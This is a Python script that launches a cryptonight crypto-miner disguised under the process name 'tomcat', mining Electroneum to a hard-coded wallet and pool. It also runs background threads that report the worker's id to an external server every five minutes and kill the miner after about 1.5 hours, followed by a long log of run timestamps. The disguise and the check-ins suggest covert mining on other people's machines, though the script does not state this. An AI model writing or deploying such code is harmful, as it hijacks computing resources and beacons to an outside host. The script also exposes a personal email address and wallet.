import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:16:06.746245
#2018-02-17 16:03:01.546812
#2018-02-17 17:49:06.472405
#2018-02-17 19:37:05.751671
#2018-02-17 21:27:02.224274
#2018-02-17 23:11:04.952663
#2018-02-18 00:58:03.865135
#2018-02-18 02:46:06.461145
#2018-02-18 04:37:03.845684
#2018-02-18 06:28:05.149949
#2018-02-18 08:16:08.028633
#2018-02-18 10:06:02.152023
#2018-02-18 11:52:04.887438
#2018-02-18 13:37:06.191276
#2018-02-18 15:27:05.066907
#2018-02-18 17:16:03.570779
#2018-02-18 19:04:06.393139
#2018-02-18 20:51:07.166279
#2018-02-18 22:37:06.964014
#2018-02-19 00:26:06.676911
#2018-02-19 02:11:07.126659
#2018-02-19 03:59:05.631936
#2018-02-19 05:44:07.378808
#2018-02-19 07:33:03.411145
#2018-02-19 09:23:01.511302
#2018-02-19 11:12:04.675835
#2018-02-19 12:59:04.596195
#2018-02-19 14:47:07.189555
#2018-02-19 16:37:07.000937
#2018-02-19 18:25:05.713289
#2018-02-19 20:12:08.279185
#2018-02-19 22:02:06.409587
#2018-02-19 23:49:02.266357
#2018-02-20 01:35:09.229565
#2018-02-20 03:24:08.668439
#2018-02-20 05:11:01.932616
#2018-02-20 06:53:06.190968
#2018-02-20 08:40:09.342640
#2018-02-20 10:24:01.507873
#2018-02-20 12:09:04.034540
#2018-02-20 13:56:07.517137
#2018-02-20 15:40:10.660495
#2018-02-20 17:24:08.174729
#2018-02-20 19:13:06.615144
#2018-02-20 21:02:01.552384
#2018-02-20 22:48:01.280573
#2018-02-21 00:32:06.471527
#2018-02-21 02:17:06.778834
#2018-02-21 04:05:08.944817
#2018-02-21 05:52:01.647829
#2018-02-21 07:39:06.454203
#2018-02-21 09:23:07.265888
#2018-02-21 11:12:08.854675
#2018-02-21 13:00:09.841832
#2018-02-21 14:47:08.284529
#2018-02-21 16:36:01.960079
#2018-02-21 18:27:04.514395
#2018-02-21 20:12:01.323847
#2018-02-21 21:59:06.014210
#2018-02-21 23:46:08.620949
#2018-02-22 01:36:08.318754
#2018-02-22 03:24:06.259968
#2018-02-22 05:11:08.058494
#2018-02-22 06:55:07.663341
#2018-02-22 08:41:08.462071
#2018-02-22 10:28:07.771297
#2018-02-22 12:13:09.235539
#2018-02-22 14:00:14.195886
#2018-02-22 15:48:06.806175
#2018-02-22 17:36:09.056613
#2018-02-22 19:23:08.684346
#2018-02-22 21:16:06.799574
#2018-02-22 23:03:01.391937
#2018-02-23 00:48:07.317958
#2018-02-23 02:35:09.689573
#2018-02-23 04:24:07.648856
#2018-02-23 06:11:07.129786
#2018-02-23 07:56:07.349649
#2018-02-23 10:18:06.689539
#2018-02-23 12:12:08.399309
#2018-02-23 14:01:01.370682
#2018-02-23 15:53:11.538920
#2018-02-23 17:40:03.396601
#2018-02-23 19:26:05.959008
#2018-02-23 21:10:02.715416
#2018-02-23 22:55:09.448675
#2018-02-24 00:43:08.925564
#2018-02-24 02:35:08.859325
#2018-02-24 04:28:04.416022
#2018-02-24 06:13:03.406691
#2018-02-24 08:01:07.337540
#2018-02-24 09:45:08.130650
#2018-02-24 11:40:01.712510
#2018-02-24 13:31:07.659278
#2018-02-24 15:18:07.389264
#2018-02-24 17:07:07.228958
#2018-02-24 18:58:05.909599
#2018-02-24 20:44:06.434571
#2018-02-24 22:58:03.244794
#2018-02-25 02:15:07.948863
#2018-02-25 05:53:03.529581
#2018-02-25 11:37:05.898555